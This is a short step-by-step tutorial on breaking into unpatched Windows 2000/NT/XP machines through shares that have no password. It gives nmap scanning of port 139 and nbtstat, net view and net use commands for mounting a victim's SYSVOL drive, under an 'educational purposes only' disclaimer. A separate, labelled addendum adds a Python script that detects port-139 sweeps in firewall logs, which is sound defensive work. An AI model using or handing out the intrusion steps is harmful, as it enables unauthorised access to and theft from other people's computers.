This is for educational purposes only. This hack works with unpatched versions of Windows 2000/NT/XP (it only works if the shared drive has no password set by the administrator).
Step 1:
-Get an IP (range) scanner. (NMAP is a fast one)
-Scan the victim's IP on TCP/IP port 139
Step 1.1
-Open a dos prompt
-Do this by going to start/run
-Type cmd
Once you are at the DOS command prompt, type:
-NMAP -v -p 139 88.207.1.1-100 (example target IP range)
-When you get an open port, proceed to step 2
Step 2
This is what you need to type down:
Replace 255.255.255.255 with the victim's IP address.
c:\windows>nbtstat -a 255.255.255.255
If you see this, you're in:
Step 3
type down:
c:\windows>net view \\255.255.255.255
Step 4
type down:
c:\windows>net use x: \\255.255.255.255\SYSVOL
(You can replace x: with any letter you want, but not one of your own drive letters.)
Note: SYSVOL is the name of the shared hard drive.
If the command is successful, we will get the confirmation:
The command was completed successfully.
Bingo, you're inside the system now.
You can now execute any DOS command, e.g. dir x:\
(You will experience a lag in the system since it is a remote computer.)
Now open Windows Explorer or just double-click the My Computer icon on your desktop and you will see a new network drive X:\> . Now you are a hacker.
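
The defender's side of Step 1, as an added example that is not part of the original text: it flags any source address that touches TCP port 139 on several different hosts within a short window, which is what a range scan like the one above leaves in a firewall log. The log layout (modeled on the Windows Firewall log format), the sample lines, and the names `find_139_sweeps`, `min_hosts` and `window` are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, laid out like a Windows Firewall log (assumed format).
SAMPLE_LOG = """\
#Fields: date time action protocol src-ip dst-ip src-port dst-port
2024-05-01 10:00:01 ALLOW TCP 203.0.113.7 192.0.2.1 40112 139
2024-05-01 10:00:01 DROP TCP 203.0.113.7 192.0.2.2 40113 139
2024-05-01 10:00:02 DROP TCP 203.0.113.7 192.0.2.3 40114 139
2024-05-01 10:00:02 DROP TCP 203.0.113.7 192.0.2.4 40115 139
2024-05-01 10:00:03 ALLOW TCP 203.0.113.7 192.0.2.5 40116 139
2024-05-01 10:00:04 ALLOW TCP 198.51.100.20 192.0.2.5 51000 139
2024-05-01 10:06:00 ALLOW TCP 198.51.100.9 192.0.2.1 52000 443
"""

def parse(log_text):
    """Yield one dict per record, using the #Fields header for column names."""
    fields = []
    for line in log_text.splitlines():
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) < len(fields):
                continue  # skip truncated records rather than crash
            rec = dict(zip(fields, parts))
            rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
            yield rec

def find_139_sweeps(log_text, min_hosts=4, window=timedelta(seconds=60)):
    """Return {src_ip: targets} for sources hitting >= min_hosts hosts on TCP 139 in one window."""
    hits = defaultdict(list)
    for rec in parse(log_text):
        if rec["protocol"] == "TCP" and rec["dst-port"] == "139":
            hits[rec["src-ip"]].append((rec["ts"], rec["dst-ip"]))
    sweeps = {}
    for src, events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            targets = {dst for _, dst in events[start:end + 1]}
            if len(targets) >= min_hosts:
                sweeps[src] = sorted({dst for _, dst in events})
                break
    return sweeps
```

Tune `min_hosts` and `window` to the network being monitored; any host a flagged source reached with an ALLOW action is worth checking for a share that has no password set.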